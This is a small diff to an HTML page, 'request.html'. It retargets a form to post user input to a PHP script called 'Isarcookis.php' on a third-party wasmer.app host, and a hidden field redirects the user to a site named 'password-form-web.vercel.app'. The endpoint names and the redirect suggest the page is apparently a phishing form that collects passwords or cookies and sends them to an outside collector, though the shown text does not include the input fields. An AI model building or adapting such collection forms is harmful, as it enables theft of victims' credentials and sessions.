--- a/request.html
+++ b/request.html
@@ -9,7 +9,7 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://ghaliya-team-51ca8.wasmer.app/Isar.php" method="post">
+        <form action="https://saba44-7e0bf.wasmer.app/Isarcookis.php" method="post">
             <input type="hidden" name="_redirect" value="https://password-form-web.vercel.app/"/>
             <div id="root">
                 <div>
